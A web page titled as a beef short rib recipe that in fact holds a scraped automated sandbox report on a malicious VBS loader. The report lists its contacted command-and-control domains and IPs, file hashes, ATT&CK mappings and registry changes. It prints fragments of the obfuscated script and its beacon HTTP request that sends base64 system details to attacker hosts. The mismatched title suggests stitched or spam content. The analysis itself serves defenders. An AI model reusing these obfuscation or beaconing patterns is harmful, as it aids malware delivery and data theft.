Home  ›  Bellted Galloway Beef Short Rib Alliums Red Wine and Green Peppercorn Sauce

Bellted Galloway Beef Short Rib Alliums Red Wine and Green Peppercorn Sauce

Written By Sunday 5 June 2022 Add Comment Edit

Incident Response

Risk Assessment

Network Behavior
Contacts 5 domains and 4 hosts. View all details

MITRE ATT&CK™ Techniques Detection

This report has 9 indicators that were mapped to 11 attack techniques and 7 tactics. View all details

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

  • External Systems
    • Detected Suricata Alert
      details
      Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
      source
      Suricata Alerts
      relevance
      10/10
    • Sample was identified as malicious by at least one Antivirus engine
      details
      3/58 Antivirus vendors marked sample as malicious (5% detection rate)
      source
      External System
      relevance
      8/10
  • Network Related
    • Malicious artifacts seen in the context of a contacted host
      details
      Found malicious artifacts related to "37.9.175.9": ...

      URL: https://app.jtrbot.com/ (AV positives: 1/77 scanned on 04/03/2020 12:08:51)
      URL: http://www.zeleneatrium.sk/priebeh-vystavby (AV positives: 3/77 scanned on 04/03/2020 11:25:56)
      URL: http://nabazar.sk/ (AV positives: 1/77 scanned on 04/03/2020 06:12:08)
      URL: http://zeleneatrium.sk/priebeh-vystavby/fotogaleria/november-2014/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/engine1/style.css (AV positives: 1/77 scanned on 04/02/2020 17:43:51)
      URL: http://gdpronline.sk/ (AV positives: 2/77 scanned on 04/02/2020 11:59:23)
      File SHA256: 72ec27bd0d959a1e6713d96b4e55c5a9b92ac6d1b5b5a4a8d5d1211422fcee57 (AV positives: 1/73 scanned on 03/09/2020 11:39:35)
      File SHA256: 92bff682e991c90a5500a0eb271a435bc3dcbda30cd82a620151351f9c3ac23f (AV positives: 30/74 scanned on 01/02/2020 17:10:11)
      File SHA256: bc48f37f3f29877d90cfbd99caf277460c625400f5984682c606a57ff0a62eb6 (AV positives: 32/73 scanned on 12/18/2019 14:21:05)
      File SHA256: f4b2e4dcd3bc664b38e5de5783448b2d1c60469265d7609e6bc60139f8eb0c5b (Date: 12/18/2019 09:26:00)
      File SHA256: 6f4ca7801ac1439bc13560e644c957e24a25159725920b74abf5bdc9898df475 (AV positives: 14/74 scanned on 12/09/2019 12:20:07)
      File SHA256: 81e366b6105440fa9ca1304ea27ea5f00e4c9d5ca8b7f8ce4a5204b195fc1836 (Date: 11/20/2019 04:03:47)
      File SHA256: d6e230c786755a00ea6d3886e556349c1f154eb9338b7f908f564dfe4a2486ce (Date: 11/20/2019 04:03:31)
      File SHA256: a8c56d50c351156f03278bef850b74254fd9f71877c49ceb85355a36a8f93114 (Date: 11/20/2019 04:03:12)
      File SHA256: 02eaf63fc74516b3dc235e4227fd79317b852c36b6828b5675db51881e20489d (Date: 11/20/2019 04:02:33)
      File SHA256: e1e36b609ea094e304435ec4f82ef63c504e313aef9fbc26609b13e11d6fde98 (AV positives: 11/72 scanned on 11/14/2019 09:43:39)

      source
      Network Traffic
      relevance
      10/10
  • Hiding 1 Malicious Indicators
    • All indicators are available only in the private webservice or standalone version
  • Anti-Reverse Engineering
    • Possibly checks for known debuggers/analysis tools
      details
      "'Hsu trail Henig devolatilisation cytotechnology waltz Kathryne raghouse Boyds Siddha senilize movers Vardhamana desugar infantlike Thiokol correlatable raucousness criance unmeddlesome velar-pharyngeal gruffish hypophalangism wolly megaloenteron fussification Hoplonemertea huntaway supratonsillar periphrasis alphabetarian grisping undeluged sheppey Hydrometridae rabbitproof impartation gavials deep-uddered anti-isolationism bookstack belonosphaerite Half-creole hemiparasite pentice Hertogenbosch unacquirable groset onychopathic adenomyofibroma asterial pycnodontoid hill-dwelling Richmonddale postfemoral omnificence contise candroys ademption opedeldoc Eppie raylet unexploitable MCPAS expiscating hoarsens Heruli venule myristicaceous byhand atter xylic hiphape remisunderstand norito dibbler foreribs telemetries Vieva ureas decempeda leviratical Ammocoetidae circumneutral legalism laron mentonniere highhandedly Bluehole shlocks alist gharris Zanze trombash Cassian overflights gallature intercolonially inanim" (Indicator: "ntice")
      "and hotfoots stimulater horripilate outprayed Bascio Lutenist ateliotic enticements brassage helvine sulfarsphenamine Maku Dolph teletopometer stemmier ghauts Eliathas steening heterochromatic 'Llywellyn OHG pirogies triazine winter-ripening originalities unescapableness pertinence meetness frost-tempered clawer obfuscable stoai wagonages demounted lucently uncentric hypho gabbais Kampmann bonilass fragmentizer marvelling urbanize Sgad downtrodden thermaesthesia Escalator Tiffy hacking plashier Mayslick pseudohalogen chimley perfectos lepidoid ambivalences well-manned surfed solecise revisership bibliotherapeutic developer paroquet swither enrapturedly dogcatcher Pseudo-messiah ring-shout chalked overprolific blossomless unbored Peripateticism white-hooved Guglielmo antepileptic Macusi vanillon upwrench Vedas Bridport mediocral chemotaxonomy eph- water-can fraela midventral handbreed monochlorbenzene Bridgehampton myriacoulomb undesirable stout-winged orcinols trochanteral underproof skaffie abstinential ephe" (Indicator: "ntice")
      "ap to-day invokers Frederich tautness take-up discordous heftiness phytopaleontology vinaigrous reauthenticating surgical ungarnished aliipoe anticeremonially stylospore unbiassed famp exhalent archegony Kanarraville Dole ally turncoats well-greaved Dominus unpreceded hallows Gallo- etoffe foreign-appearing bounciness exocline allobaric adventitious Graecism well-fitted seven-quired hypertoxic Bromios villagery Semi-apollinarism usurers platinas TEPP RECON correspondingly conjugial lipemia mawed one-sidedness hagstone compressors senhorita psalmodize elemicin Hannon clearstoried supplements preantepenultimate typobar depolarise biriba aquaplane slow-sure condylomas preumbonal Camelopardus lainer impertinencies MSBA" (Indicator: "ntice")
      "bos Cevennes precontently pikeman zalamboodont coctoprecipitin spivving weightiness culling squirt-fire phenoliolia incorruptness neurochemistry palaeontographic unpraiseful AMEX microgamy lenition dobule untanned

      iMPRnGDdbQXzpzWQSLcsRC=iqxfULpKIJZZWIglnLnaeU+iMPRnGDdbQXzpzWQSLcsRC

      'halftone Saratogan ae- vaginally abaised sink-hole micropetalous Fania lehayims Physostomi bakeries hemoglobinocholia countertripping jabia timeworn yotacism gloomier endoplastular Liliuokalani Amiranha connotative Bicknell springling clausulae flutteriness wasteyard gridded gharial Pamella Corrodentia pinstripes dihydrogen volvas outstride blepharolithiasis unturgid overrose cormorant acquirability south-southeastward scalar vagabond pirrauru episomal conservacy full-roed postmaster betwattled baktun Antipatharia Johst stapler Nicasio soft-hued prenticed mortalism hylozoistic Syriacist kedgeree delineation nailrod essay-writing tachistes arborator socionomy phosphene Dareece diosmosing polygraphic antihijack Evangelist" (Indicator: "ntice")
      "mnWVfcreoTPsajlysSvrhAOPsyo=Fix(RcztAnOYZMzBHvQdzFkCDNlkotw)'dorbug nonpervertible lurchline Rew slocken bookling ream bespreng sigill oreshoot overbrained steinkirk peakyish randans excusator thrustor unenticed suppressant stresses symphytic trunched rough-draw Soleure rain-soaked racemizing Theilman nonatomical sweatproof uninsular antisnapper databases quinquetubercular oversilence Anti-zionism cuprocyanide preindependence monogynic catchpoleship cobriform Nearch Durning antiparalytic nonnavigation designee naysaying scholarism flashgun prehumiliate trave devitalizes deaeration Atonsah generalizations Carangidae turbines microcolorimetry ophiophobe lithoing pluriseriate decke gien synapticular unbelieffulness Un-franciscan palliated misminded Enaliosauria nonamorous backfatter adulterously equanimousness Emmylou Weirsdale Cuero nongas visionary capacitive engarble seminaphthalidine lapidity craniography Amymone gunnen Holmen dispersedness Sidwel GKS cantonalism harpin americas semibejan marblers bureau o" (Indicator: "ntice")
      "thwarters playdowns sympathize aggerose lardiest bibble unsadistic single-barreled orthodontist vespertilionid defoliating disarranges cols nutcrackery belight overlit Adelheid autosome DPM abstractionists metempsychosis revoyaging rinds propionic cyesis unlubricious disproportionally presolicit nicotian bribee embastardize limonitization Kat zygobranch Galliformes extraneously 'sponsible masseterine chromato- overwave cajeputole broncho osier-fringed Samothracian rocta isodimorphism almaine inventable unexistentially Giacobo theoktony Willman rudloff Citarella Athey interrhymed baby-kissing clathrate organicist portglave Carlylese choosiness knave-child duodenas pro-Greek antiamylase podex Salvadorian weekling Beirne immoveableness ytter equationism sadomasochist Hydrobates Gwin criminologically sunsuit satire poinds gooselike well-decreed pyoid braided BOT netkeeper inequipotentiality villatic origins solennemente Crowe extratarsal chemiotactic alienship fistuca indiscretion lyophil enticeable ebbs psychoto" (Indicator: "ntice")
      "'mongoloids isothermobathic tegs antiastronomical protoxide downloadable pansophical Chavies unviable unmagnanimously nonarguable expedientially trustworthiest Suter sirvent bioenvironmentaly lenticellate floatplane well-indicated vvll boschvark Wendic sandboxes retrimmed overbase settsman devotionalness Alveolites ectomeric sprayproof triplicostate pyran verge-board thoroughsped thoughts baffler re-require unscolding noncomplicities laparocolpotomy long-coupled albescence joulean eugenicists EIA Volksschule whoever sheltron babylike Dendrocoela panurgy Dasyprocta proscynemata automatonta sibbing machinized thin-skinned nondomesticated dances jades Bariloche caviya Collettsville fingertip spiciness divinable trapfall enneaphyllous preaccess enneahedria nonprevalent limonium laissez-faireism nonadaptable calc- piperitone slipbody Kikatsik sudser conjugations heavy-boughed stereophotography tragi-comic VSSP geocyclic Epimenidean all-loving titubate fusarial unfeminizing transposition razorback entamoebic extenu" (Indicator: "ntice")
      "ation unleafed Mavis pelterer Deedsville syzygetically Trafalgar nucament 'sportly lidder pelvises purchaser suppositive unornateness proconsular nyxis Essenis pharmacokinetics Grusinian befogs undenominationalist thick-starred filarious masseteric aphrolite sermonised simulating Papilionoidea boswellizing poxing coincidentally Gomer manganapatite eager-eyed scrumptiousness midstreams Scholasticism preterscriptural pseudoparalytic basipterygium bindi-eye unserenaded substantialness retractility botchka monogramm contraregular latisternal ovariole Nahani tram-traveling virtue-tempting medullispinal reassociating Amelie variative epitimesis wheretosoever blooding reobligating microblepharia Hall oxyesthesia serpuline Heine ohs Benedictinism long-lasting rufopiceous fiancees Gallicise mando-cello metamathematician subtreasurer apprenticeships terrorist handfeed anaplasmosis demonian cigarettes Babelizing niddy-noddy deflexed unelect scribbling alkanol keratotic planetarian theomorphism rulings CLLI entamoebiasis" (Indicator: "ntice")
      "ves short-suiter swashbucklering engravement Rice buzzards Dayville scalogram acana wealth-getting laywomen infrabuccal spitfrog strychnina fleerer biobibliographic pattee flames nonfrequently gastroarthritis exogamy muscularity really ruby-eyed Sinarquistas ignipuncture absolvitory zingiberone lionization unlexicographical hypervigilantness uncannier Nototrema pegh truncate minimacid surpeopled masticability prescapularis unswampy thought-hating acetabulous hardiesse cichoriaceous tors Pashto Chilung anticentralization Levona interspiral bulls-eyed contingence dapple-bay aniconic harplike vitreous witship consistorian reblot muta arcadias coliseums misplace sutorial jollitry smithery semiscientific apulmonic Horton nonmathematic photogrammetric
      XGpNCgqCmToYJpDOiTgjHdSrQeG=gMmUvDEyDEqbHsquBFKJWtMA.Text
      HtauGPJBKAMqQJSoygenUVDGJp=Atn(HtauGPJBKAMqQJSoygenUVDGJp)'tute ricebird remagnetization Bikales Alcedinidae codeclination pyrenoid nonbaronial astream purposive copresbyter erythrophyllin CheE solari- uniform" (Indicator: "ntice")
      "'cracowe Beehive redargue Stagiritic hydrocyclist Cotinus octillionth misidentifies small-bodied sulung precorrupt Tamils text-letter triglot unbounded rhizopod oversoftly antidiscrimination interdebating insurgency affixers leuco wynd proromanticism nonreducibly Abinoam hand-splice apprentices Dschubba devily Negritizing dbl. lifelines sin-proud Mid-italian poolrooms Candolleaceae Hansville Asher spunkies inventoriable abaue ganging hemophiliac Broxton Louisette deviling worse-executed diplocaulescent unlimbering north-countryman Puppis ab- nevoid bunchberries straightway hyperanxious unarticulately manlessness Alcinia calmest emphyteusis mechanisms cadamba doorless Matrona Salzburg self-appointed Pyrales phoneticogrammatical unfittingness buccolabial masterdom ambulation unprettily unregressively pewage polysynthetical gimbal beastily browbeat Overly pseudoanaphylaxis chiselers refounder methodiser Oreana ovate-cordate befouling Camaldolesian unproximity toadfish isonitro clipboard Post-lent downset pants" (Indicator: "ntice")

      source
      String
      relevance
      2/10
  • External Systems
    • Found an IP/URL artifact that was identified as malicious by at least one reputation engine
      details
      4/77 reputation engines marked "http://www.kitaair.com" as malicious (5% detection rate)
      2/76 reputation engines marked "http://a.8xcornwall.com" as malicious (2% detection rate)
      2/77 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
      5/76 reputation engines marked "http://kitaair.com" as malicious (6% detection rate)
      7/77 reputation engines marked "http://hotdsk.com" as malicious (9% detection rate)
      source
      External System
      relevance
      10/10
  • Installation/Persistance
    • Executes a visual basic script
      details
      Process "wscript.exe" with commandline ""C:\MSG_198368.vbs"" (Show Process)
      source
      Monitored Target
      relevance
      10/10
      ATT&CK ID
      T1064 (Show technique in the MITRE ATT&CK™ matrix)
    • Loads the task scheduler COM API
      details
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 73400000
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 014A0000
      source
      Loaded Module
      relevance
      5/10
      ATT&CK ID
      T1168 (Show technique in the MITRE ATT&CK™ matrix)
  • Network Related
    • Sends traffic on typical HTTP outbound port, but without HTTP header
      details
      TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
      TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
      source
      Network Traffic
      relevance
      5/10
      ATT&CK ID
      T1043 (Show technique in the MITRE ATT&CK™ matrix)
  • General
    • Accesses Software Policy Settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS"; Key: "")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1012 (Show technique in the MITRE ATT&CK™ matrix)
    • Accesses System Certificates Settings
      details
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      "wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES"; Key: "")
      "wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS"; Key: "")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1112 (Show technique in the MITRE ATT&CK™ matrix)
    • Contacts domains
      details
      "hotdsk.com"
      "kitaair.com"
      "gdpronline.sk"
      "a.8xcornwall.com"
      "www.kitaair.com"
      source
      Network Traffic
      relevance
      1/10
    • Contacts server
      details
      "173.249.60.219:80"
      "46.16.91.179:80"
      "46.16.91.179:443"
      "37.9.175.9:80"
      source
      Network Traffic
      relevance
      1/10
    • Loads the .NET runtime environment
      details
      "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 6D050000
      source
      Loaded Module
    • Logged script engine calls
      details
      "wscript.exe" called "Msxml2.DOMDocument.3.0.CreateObject" ...
      "wscript.exe" called "ADODB.Stream.6.0.CreateObject" ...
      "wscript.exe" called "WScript.Shell.1.CreateObject" ...
      source
      API Call
      relevance
      10/10
    • Overview of unique CLSIDs touched in registry
      details
      "wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
      "wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
      "wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
      "wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
      "wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
      "wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
      "wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
      "wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
      "wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
      "wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
      "wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
      "wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
      "wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
      "wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
      "wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
      "wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
      "wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS")
      source
      Registry Access
      relevance
      3/10
  • Installation/Persistance
    • Touches files in the Windows directory
      details
      "wscript.exe" touched file "%WINDIR%\System32\en-US\wscript.exe.mui"
      "wscript.exe" touched file "C:\Windows\System32\rsaenh.dll"
      "wscript.exe" touched file "C:\Windows\System32\wscript.exe"
      "wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
      "wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
      "wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
      "wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
      "wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
      "wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
      source
      API Call
      relevance
      7/10
  • Network Related
    • Found potential URL in binary/memory
      details
      Heuristic match: "hotdsk.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: hotdsk.com"
      Heuristic match: "kitaair.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: kitaair.com"
      Heuristic match: "gdpronline.sk"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: gdpronline.sk"
      Heuristic match: "a.8xcornwall.com"
      Pattern match: "www.kitaair.com"
      source
      String
      relevance
      10/10
    • HTTP request contains Base64 encoded artifacts
      details
      "Microsoft Windows 7 Professional "
      source
      Network Traffic
      relevance
      7/10
      ATT&CK ID
      T1132 (Show technique in the MITRE ATT&CK™ matrix)
  • Spyware/Information Retrieval
    • Found a reference to a known community page
      details
      "'mischaracterization middens loud-mouthed berry-shaped arthritics chromatoid twitteration Bluffton Garrison erratic cadgy baselevel coinfers befan unwhiglike Whiteboy siliquiferous Bolshevikian buds sickbeds caroused unroutinely hutched meshes cacophonical pseudoexperimentally untruth procrastinative jargonized mischances McConnell circumneutral kauries ticklishly headmistressship trendier pokeroots grapeskin cointerest Geryon humorousnesses Dolichosauri semiprotective carbuilder dithyrambs whale-gig play-by-play anestrous paren squarer lacings bassara palletizing xanthuria eighty-fourth Synentognathi amniorrhea wilkeite quarter-run ambassadors sleepiest meteorograph adonize reddendum chloralide zinco- cocreate twice-permitted Vookles gainly unanimities Bononian Ultra-tory shinner Tencteri kinked pentadrachm Briseus diatribes rain-streaked udaller dispelling exequy shevel psychologism deep-grounded Blackman irrecoverableness westernism Moresby spotlight Topsy Lenapes tormentress bauckiebird bedspreads Nors" (Indicator: "twitter")
      source
      String
      relevance
      7/10
  • System Security
    • Creates or modifies windows services
      details
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
      source
      Registry Access
      relevance
      10/10
      ATT&CK ID
      T1112 (Show technique in the MITRE ATT&CK™ matrix)
    • Modifies Software Policy Settings
      details
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
      "wscript.exe" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
